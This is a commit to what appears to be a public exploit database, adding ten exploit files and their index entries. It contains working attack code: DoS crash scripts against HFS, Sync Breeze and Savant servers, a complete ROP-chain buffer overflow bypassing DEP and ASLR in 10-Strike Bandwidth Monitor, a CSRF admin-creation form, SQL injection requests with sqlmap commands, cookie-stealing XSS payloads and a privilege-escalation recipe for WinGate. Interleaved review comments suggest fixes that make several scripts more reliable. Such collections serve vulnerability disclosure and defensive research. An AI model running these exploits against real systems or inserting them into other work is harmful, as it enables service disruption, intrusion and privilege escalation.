DB: 2020-06-11
10 changes to exploits/shellcodes Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC) Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC) Savant Web Server 3.1 - Denial of-Service (PoC) ALLPlayer 7.5 - Denial of-Service (PoC) 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR) WinGate 9.4.1.5998 - Insecure Folder Permissions HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
This commit is contained in:
parent
809b91dc6f
commit
6ec646f7e1
11 changed files with 602 additions and 0 deletions
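--- a/exploits/multiple/remote/48569.py
+++ b/exploits/multiple/remote/48569.py
@@ -0,0 +1,192 @@
+# Exploit Title: HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)
+# Date: 2020-06-05
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.rejetto.com
+# CVE : CVE-2020-13432
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.rejetto.com
+
+
+[Product]
+HFS Http File Server v2.3m Build 300
+
+
+[Vulnerability Type]
+Remote Buffer Overflow (DoS)
+
+
+[CVE Reference]
+CVE-2020-13432
+
+
+[Security Issue]
+rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual
+files or folders are used, allows remote attackers to trigger an
+invalid-pointer write access violation via concurrent HTTP requests
+with a long URI or long HTTP headers like Cookie, User-Agent etc.
+
+Remote unauthenticated attackers can send concurrent HTTP requests
+using an incrementing or specific payload range of junk characters for
+values in the URL parameters or HTTP headers sent to the server. This
+results in hfs.exe server crash from an invalid pointer write access
+violation.
+
+Requirements:
+hfs.exe must have at least one saved virtual file or folder present.
+Test using a remote IP and NOT from the same machine (localhost).
+
+Dump...
+
+(e4c.3a8): Access violation - code c0000005 (first/second chance not available)
+For analysis of this file, run !analyze -v
+WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
+eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002
+eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
+ntdll!RtlpResolveAssemblyStorageMapEntry+0x18:
+777ef8b4 53 push ebx
+0:000> !load winext/msec
+0:000> !exploitable
+WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
+*** WARNING: Unable to verify checksum for hfs.exe
+Exploitability Classification: EXPLOITABLE
+Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71)
+
+PROCESS_NAME: hfs.exe
+
+FOLLOWUP_IP:
+hfs+8fad7
+0048fad7 8945f0 mov dword ptr [ebp-10h],eax
+
+WRITE_ADDRESS: 000a0e08
+
+
+[References]
+https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01
+
+
+[Exploit/POC]
+from socket import *
+import time,sys
+
+#HFS HTTP File Server v2.3m build 300.
+#Vendor: www.rejetto.com
+#Remote Remote Buffer Overflow DoS
+#Note: hfs.exe must have at least one saved virtual file or folder on the target
+#test using a remote IP and not from the same machine.
+#Discovery: hyp3rlinx
+#hyp3rlinx.altervista.org
+#ISR: ApparitionSec
+#=========================================================================
+res=""
+once=0
+cnt=0
+max_requests=1666
+
+def hfs_dos():
+
+    global ip,port,length,res,once,cnt,max_requests
+
+    cnt+=1
+
+    length += 1
+    payload = "A"*length
+
+    try:
+        s=socket(AF_INET, SOCK_STREAM)
+        s.settimeout(2)
+        s.connect((ip,port))
+        ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n"
+        bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n"
+        s.send(bof.encode("utf-8"))
+        if once==0:
+            once+=1
+            res = s.recv(128)
+            if res != "":
+                print("Targets up please wait...")
+            if "HFS 2.3m" not in str(res):
+                print("[!] Non vulnerable HFS version, exiting :(")
+                exit()
+    except Exception as e:
+        if e != None:
+            if str(e).find("timed out")!=-1:
+                if res=="":
+                    print("[!] Target is not up or behind a firewall? :(")
+                    exit()
+                else:
+                    print("[!] Done!")
+                    exit()
+    s.close()
+
+    if cnt == max_requests:
+        return False
+    return True
+
+
+def msg():
+    print("HFS HTTP File Server v2.3m build 300.")
+    print("Unauthenticated Remote Buffer Overflow (DoS - PoC)")
+    print("Virtual HFS saved file or folder required.")
+    print("Run from a different machine (IP) than the target.")
+    print("By Hyp3rlinx - ApparitionSec\n")
+
+if __name__=="__main__":
+
+    length=3
+
+    if len(sys.argv) != 3:
+        msg()
+        print("Usage: <hfs.exe Server>, <Port (usually 8080)>")
+        exit()
+
+    ip = sys.argv[1]
+    port = int(sys.argv[2])
+
+    msg()
+
+    while True:
+        if not hfs_dos():
+            print("[!] Failed, non vuln version or no virtual files exist :(")
+            break
+
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=qQ-EawfXuWY
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: May 18, 2020
+Vendor reply: May 18, 2020
+Vendor confirm vulnerability: May 19, 2020
+Vendor creates fix: May 20, 2020
+Vendor released new version 2.4 : June 7, 2020
+June 8, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx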
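Review bot: `if res != "":` and `if res=="":` in hfs_dos() compare the bytes object returned by `s.recv(128)` against a str, so under Python 3 (which the `bof.encode("utf-8")` call and `print(...)` syntax indicate) the first test is always true and the second always false: the "Target is not up or behind a firewall?" branch is unreachable and every timeout is reported as "[!] Done!". Initialising `res=b""` and comparing against `b""` would make the two status messages distinguishable again. The global `length` is only assigned inside the `__main__` guard, so importing the module and calling `hfs_dos()` directly raises `NameError`; a module-level `length=3` next to the other globals would document and fix that. The advisory also notes the file combines a text advisory with the script, so the .py is not runnable as written without trimming the surrounding prose.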
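--- a/exploits/php/webapps/48571.txt
+++ b/exploits/php/webapps/48571.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
+# Google Dork: N/A
+# Date: 2020-06-10
+# Exploit Author: Extinction
+# Vendor Homepage: https://adikiss.net/
+# Software Link: https://adikiss.net/2014/06/aplikasi-sistem-informasi-pengumuman-kelulusan-online-2/
+# Version: latest
+# Tested on: Linux,windows,macOS
+
+# Description SpearSecurity :
+# CSRF vulnerability was discovered in Sistem kelulusan.
+# With this vulnerability, authorized users can be added to the system.
+
+POC:
+
+<html>
+<body>
+<center>
+<hr>
+<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
+<input type="text" class="form-control" name="nama"
+placeholder="Username" size="35">
+<br>
+<input type="text" class="form-control" name="username"
+placeholder="Spear" size="35">
+<br>
+<input type="text" class="form-control" name="pass"
+placeholder="Security" size="35">
+<br>
+<br>
+<input type="submit" name="submit" id="submit" value="Simpan Data"
+class="btn btn-primary" onclick="tb_remove()">
+</form>
+<hr>
+<h1> CODED BY SPEAR-SECURITY </h1>
+<h2> Author Extinction </h2>
+</body>
+</html>
+
+#SpearSecurity-ID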
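--- a/exploits/php/webapps/48572.txt
+++ b/exploits/php/webapps/48572.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)
+# Date: 2020-04-17
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Vendor Homepage: https://www.j2store.org/
+# Software Link: https://www.j2store.org/download.html
+# Reference: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html
+# Change Log: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html
+# Version: 3.3.11
+# Tested on: Kali Linux - Apache2
+--------------------------------------------------------------------------------
+Detail:
+--------------------------------------------------------------------------------
+File: administrator/components/com_j2store/models/products.php
+Vulnerable parameter: filter_order_Dir, filter_order
+
+PoC:
+Request:
+--------------------------------------------------------------------------------
+POST /joomla/administrator/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/joomla/administrator/index.php?option=com_j2store&view=products
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 312
+Connection: close
+Cookie: [COOIKE]
+Upgrade-Insecure-Requests: 1
+
+option=com_j2store&view=products&task=browse&boxchecked=0&filter_order=[SQLi]&filter_order_Dir=[SQLi]&2d42ab72d5c2716881de5d802d08ca7f=1&search=1&product_type=0&limit=20&since=&until=&productid_from=&productid_to=&pricefrom=&priceto=&sku=&manufacturer_id=&vendor_id=&taxprofile_id=&visible=&limitstart=0
+--------------------------------------------------------------------------------
+
+
+
+sqlmap -r sqli --dbs --risk=3 --level=5 --random-agent -p filter_order_Dir
+
+--------------------------------------------------------------------------------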
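--- a/exploits/php/webapps/48574.txt
+++ b/exploits/php/webapps/48574.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
+# Date: 2020-06-09
+# Exploit Author: Mosaaed
+# Vendor Homepage: http://virtualairlinesmanager.net/
+# Dork: N/A
+# Affected Version: 2.6.2
+# Tested on: Ubuntu
+# CVE : N/A
+
+-------------------
+xss
+
+http://localhost/vam/index.php?page=plane_info_public®istry_id=“><<script>alert(document.cookie);//<</script>
+http://localhost/vam/index.php?page=fleet_public&plane_icao=1“><<script>alert(document.cookie);//<</script>
+http://localhost/vam/index.php?page=hub&hub_id=1“><<script>alert(document.cookie);//<</script>
+http://localhost/vam/index.php?page=fleet_public&plane_location=1“><<script>alert(document.cookie);//<</script>
+http://localhost/vam/index.php?page=event&event_id=1“><<script>alert(document.cookie);//<</script>
+-------------------------
+SQL Injection
+sqlmap -u "http://localhost/vam/index.php?page=manual_flight_details&ID=10" -p ID --dbs
+sqlmap -u "http://localhost/vam/index.php?page=plane_info_public®istry_id=10" -p registry_id --db
+sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_icao=1" -p plane_icao --dbs
+sqlmap -u "http://localhost/vam/index.php?page=hub&hub_id=1" -p hub_id --dbs
+sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_location=1" -p plane_location --dbs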
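--- a/exploits/windows/dos/38079.py
+++ b/exploits/windows/dos/38079.py
@@ -0,0 +1,26 @@
+#!/usr/bin/python
+import socket
+import sys
+from struct import pack
+
+try:
+    server = sys.argv[1]
+    port = 80
+    size = 260
+
+    httpMethod = b"GET /"
+    inputBuffer = b"\x41" * size
+    httpEndRequest = b"\r\n\r\n"
+
+    buf = httpMethod + inputBuffer + httpEndRequest
+
+    print("Sending evil buffer...")
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((server, port))
+    s.send(buf)
+    s.close()
+
+    print("Done!")
+
+except socket.error:
+    print("Could not connect!")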
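Review bot: `server = sys.argv[1]` is read inside a `try` whose only handler is `except socket.error:`, so running the script with no argument ends in an uncaught `IndexError` traceback rather than a usage message, and `from struct import pack` is imported but never used in this file. A guard before the `try`, `if len(sys.argv) != 2: sys.exit("usage: 38079.py <host>")`, would make the failure mode explicit. The same argv-inside-try pattern appears in exploits/windows/dos/43200.py and exploits/windows/dos/44481.py; only 44481.py actually uses the `pack` it imports.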
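--- a/exploits/windows/dos/43197.py
+++ b/exploits/windows/dos/43197.py
@@ -0,0 +1,8 @@
+#!/usr/bin/python
+
+buffer = b"http://"
+buffer += b"\x41" * 1500
+
+f=open("player.m3u","wb")
+f.write(buffer)
+f.close()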
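Review bot: The output file is opened with a bare `open`/`close` pair, so if `f.write` raises the handle is never closed; the idiomatic form is `with open("player.m3u", "wb") as f: f.write(buffer)`. The script also silently overwrites any existing player.m3u in the current directory, which a one-line header comment stating the output file name would at least make visible to the reader.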
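--- a/exploits/windows/dos/43200.py
+++ b/exploits/windows/dos/43200.py
@@ -0,0 +1,33 @@
+#!/usr/bin/python
+import socket
+import sys
+
+try:
+    server = sys.argv[1]
+    port = 80
+    size = 800
+    inputBuffer = b"A" * size
+    content = b"username=" + inputBuffer + b"&password=A"
+
+    buffer = b"POST /login HTTP/1.1\r\n"
+    buffer += b"Host: " + server.encode() + b"\r\n"
+    buffer += b"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
+    buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+    buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
+    buffer += b"Referer: http://10.11.0.22/login\r\n"
+    buffer += b"Connection: close\r\n"
+    buffer += b"Content-Type: application/x-www-form-urlencoded\r\n"
+    buffer += b"Content-Length: "+ str(len(content)).encode() + b"\r\n"
+    buffer += b"\r\n"
+    buffer += content
+
+    print("Sending evil buffer...")
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((server, port))
+    s.send(buffer)
+    s.close()
+
+    print("Done!")
+
+except socket.error:
+    print("Could not connect!")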
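--- a/exploits/windows/dos/44481.py
+++ b/exploits/windows/dos/44481.py
@@ -0,0 +1,31 @@
+#!/usr/bin/python
+import socket
+import sys
+from struct import pack
+
+try:
+    server = sys.argv[1]
+    port = 9121
+    size = 1000
+
+    inputBuffer = b"\x41" * size
+
+    header = b"\x75\x19\xba\xab"
+    header += b"\x03\x00\x00\x00"
+    header += b"\x00\x40\x00\x00"
+    header += pack('<I', len(inputBuffer))
+    header += pack('<I', len(inputBuffer))
+    header += pack('<I', inputBuffer[-1])
+
+    buf = header + inputBuffer
+
+    print("Sending evil buffer...")
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((server, port))
+    s.send(buf)
+    s.close()
+
+    print("Done!")
+
+except socket.error:
+    print("Could not connect!")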
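--- a/exploits/windows/local/48570.py
+++ b/exploits/windows/local/48570.py
@@ -0,0 +1,98 @@
+# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH,DEP,ASLR)
+# Exploit Author: Bobby Cooke
+# Date: 2020-07-07
+# Vendor Site: https://www.10-strike.com/
+# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
+# Tested On: Windows 10 - Pro 1909 (x86)
+# Version: version 3.9
+# Exploit Details:
+# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
+# 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
+# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
+# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
+# 4. A pointer to the LoadLibraryA symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call LoadLibraryA and find the memory address of the [kernel.dll] module; as it is protected by ASLR and will be different every time the process runs.
+# 5. A pointer to the GetProcAddress symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call GetProcAddress to find the memory address of the WinExec Symbol within [kernel32.dll].
+# 6. Use Gadgets to call the WinExec Function and open calc.
+# - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
+# Recreate:
+# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
+# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
+# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
+# -------------------------------------------------------------------------------------------
+# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
+# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
+# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
+# -------------------------------------------------------------------------------------------
+
+import struct
+OS_retSled = '\x41'*400
+retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
+def createRopChain():
+    ropGadgets = [
+        # HMODULE LoadLibraryA( LPCSTR lpLibFileName);
+        # $ ==> > 1106905D CALL to LoadLibraryA
+        # $+4 > 012428B4 FileName = "kernel32.dll"
+        0x012126f5, # POP EAX # RETN [BandMonitor.exe]
+        0x110e70bc, # kernel32!loadlibrarya [LIBEAY32.dll]
+        0x110495ef, # JMP [EAX] [LIBEAY32.dll]
+        0x1106905d, # PUSH EAX # POP ESI # RETN [LIBEAY32.dll]
+        0x012428B4, # &String = "kernel32.dll\x00"
+        # EAX&ESI = &kernel32.dll
+        # FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName);
+        # $ ==> > 011D53D2 CALL to GetProcAddress
+        # $+4 > 76C40000 hModule = (KERNEL32)
+        # $+8 > 0014F6CC ProcNameOrOrdinal = "WinExec"
+        0x01226010, # PUSH ESP # AND AL, 4 # POP ECX # POP EDX # RETN [BandMonitor.exe] - [move esp -> ecx]
+        0xfffff2D4, # EDX = Offset2String; ECX = ESP
+        0x011d53d2, # xchg eax, ecx # ret [BandMonitor.exe] - eax=esp & ecx = "kernel32.dll\x00"
+        0x11061ea7, # sub eax, edx # ret [LIBEAY32.dll]- eax=&String="WinExec\d4"
+        0x1106905d, # push eax # pop esi # ret [LIBEAY32.dll] - ESI&EAX="WinExec\d4"
+        0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,
+        # (INC EAX # RETN)*7 [LIBEAY32.dll]
+        0x011f282b, # xor [eax], dl # ret [BandMonitor.exe] - ESI="WinExec\x00"
+        0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="WinExec\x00"
+        0x11084dca, # xchg eax, edx # ret [LIBEAY32.dll] - EDX="WinExec\x00"
+        0x012126f5, # POP EAX # RETN [BandMonitor.exe]
+        0x110e708c, # kernel32!getprocaddress [LIBEAY32.dll]
+        0x1109cdb9, # mov eax, ds:[eax] # ret [LIBEAY32.dll] - EAX = &GetProcAddress
+        0x1106CE04, # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax
+        0x011d53d2, # xchg eax, ecx # ret [BandMonitor.exe] - ECX=&KERNEL32.WinExec
+        0xffffffff, # NOP - Overwritten by GetProcAddress Stack Setup
+        0xffffffff, # NOP - Overwritten by GetProcAddress Stack Setup
+        # Call WinExec( CmdLine, ShowState );
+        # CmdLine = "calc"
+        # ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
+        0x0106a762, # INC ESI # RETN [BandMonitor.exe] - ESI="calc\x"
+        0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\xff"
+        0x1106905d, # PUSH EAX # POP ESI # RETN [LIBEAY32.dll] - EAX&ESI="calc\xff"
+        0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a, # (INC EAX # RETN)*4 [LIBEAY32.dll]
+        0x01226014, # POP EDX # RETN [BandMonitor.exe]
+        0xffffffff, # dl = 0xff
+        0x011f282b, # xor [eax], dl # ret [BandMonitor.exe] - ESI="calc\x00"
+        0x01218952, # NEG EDX # RETN [BandMonitor.exe] - EDX=0x01 = SW_SHOWNORMAL
+        0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\x00"
+        0x1102ce1f, # xchg eax, ecx [LIBEAY32.dll] - ECX="calc\x00" = CmdLine - EAX=&KERNEL32.WinExec
+        0x1106CE04, # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax
+        0x11060124 # retn [LIBEAY32.dll] - ROP NOP
+    ]
+    return ''.join(struct.pack('<I', _) for _ in ropGadgets)
+ropChain = createRopChain()
+OS_nSEH = '\x43'*(4188-len(OS_retSled+retSled+ropChain))
+nSEH = '\x44'*4
+# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
+SEH = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
+WinExec = '\x57\x69\x6e\x45' # WinE
+WinExec += '\x78\x65\x63\xd4' # xec.
+calc = '\x63\x61\x6c\x63' # calc
+calc += '\xff\x42\x42\x42' # ....
+extra = '\x44'*2000
+buffer = OS_retSled + retSled + ropChain + OS_nSEH + nSEH + SEH + WinExec + calc + extra
+File = 'poc.txt'
+try:
+    payload = buffer
+    f = open(File, 'w')
+    f.write(payload)
+    f.close()
+    print File + " created successfully"
+except:
+    print File + ' failed to create'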
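Review bot: The header line `# Date: 2020-07-07` is later than this commit's own date (DB: 2020-06-11) and disagrees with the files.csv entry added for 48570 in the same commit (2020-06-10), so one of the two dates is wrong and the header should be corrected to match the index. The file-write `try:` ends in a bare `except:` that prints only ' failed to create' and swallows the actual cause (including `KeyboardInterrupt`); `except (IOError, OSError) as e:` with `e` included in the message would report why poc.txt could not be written. Opening the file with `with open(File, 'w') as f:` would also remove the explicit `close()` and the leak on a failed write.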
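--- a/exploits/windows/local/48573.txt
+++ b/exploits/windows/local/48573.txt
@@ -0,0 +1,101 @@
+# Exploit Title: WinGate 9.4.1.5998 - Insecure Folder Permissions
+# Date: 2020-06-05
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: https://www.wingate.com
+# Version: 9.4.1.5998
+# CVE: CVE-2020-13866
+
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/WINGATE-INSECURE-PERMISSIONS-LOCAL-PRIVILEGE-ESCALATION.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+wingate.com
+
+
+[Product]
+WinGate v9.4.1.5998
+
+WinGate is a sophisticated integrated Internet gateway and communications server designed to meet the control,
+security and email needs of today's Internet-connected businesses.
+
+
+[Vulnerability Type]
+Insecure Permissions EoP
+
+
+[CVE Reference]
+CVE-2020-13866
+
+
+[Security Issue]
+WinGate has insecure permissions for the installation directory, which allows local
+users ability to gain privileges by replacing an executable file with a Trojan horse.
+The WinGate directory hands (F) full control to authenticated users, who can then run
+arbitrary code as SYSTEM after a WinGate restart or system reboot.
+
+
+C:\Program Files\WinGate>cacls WinGate.exe
+C:\Program Files\WinGate\WinGate.exe NT AUTHORITY\Authenticated Users:(ID)F
+NT AUTHORITY\SYSTEM:(ID)F
+BUILTIN\Administrators:(ID)F
+BUILTIN\Users:(ID)R
+APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
+APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
+
+
+[Affected Component]
+WinGate Installation Directory
+
+[Impact Code execution]
+true
+
+[Impact Denial of Service]
+true
+
+[Impact Escalation of Privileges]
+true
+
+[Impact Information Disclosure]
+true
+
+
+[Exploit/POC]
+Logon as standard user replace WinGate.exe with a trojan executable, wait for restart or reboot the system, your code runs as SYSTEM.
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: May 10, 2020
+Vendor acknowledgement: May 10, 2020
+Vulnerability confirmed: May 18, 2020
+Request status: May 22, 2020
+No reply
+Notify vendor request CVE: May 26, 2020
+No reply
+Advised of public disclosure: June 1, 2020
+No reply
+June 4, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx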
|
@ -6737,6 +6737,10 @@ id,file,description,date,author,type,platform,port
|
|||
48502,exploits/windows/dos/48502.py,"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
|
||||
48503,exploits/windows/dos/48503.py,"Filetto 1.0 - 'FEAT' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
|
||||
48521,exploits/multiple/dos/48521.py,"BIND - 'TSIG' Denial of Service",2020-05-20,"Teppei Fukuda",dos,multiple,
|
||||
43200,exploits/windows/dos/43200.py,"Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)",2017-09-27,"Mr Bruce",dos,windows,
|
||||
44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,
|
||||
38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
|
||||
43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -11087,6 +11091,8 @@ id,file,description,date,author,type,platform,port
|
|||
48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
|
||||
48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows,
|
||||
48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows,
|
||||
48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows,
|
||||
48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18167,6 +18173,7 @@ id,file,description,date,author,type,platform,port
|
|||
48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,
|
||||
48537,exploits/windows/remote/48537.py,"Microsoft Windows - 'SMBGhost' Remote Code Execution",2020-06-02,chompie1337,remote,windows,
|
||||
48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux,
|
||||
48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -42793,3 +42800,6 @@ id,file,description,date,author,type,platform,port
|
|||
48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php,
|
||||
48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php,
|
||||
48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,
|
||||
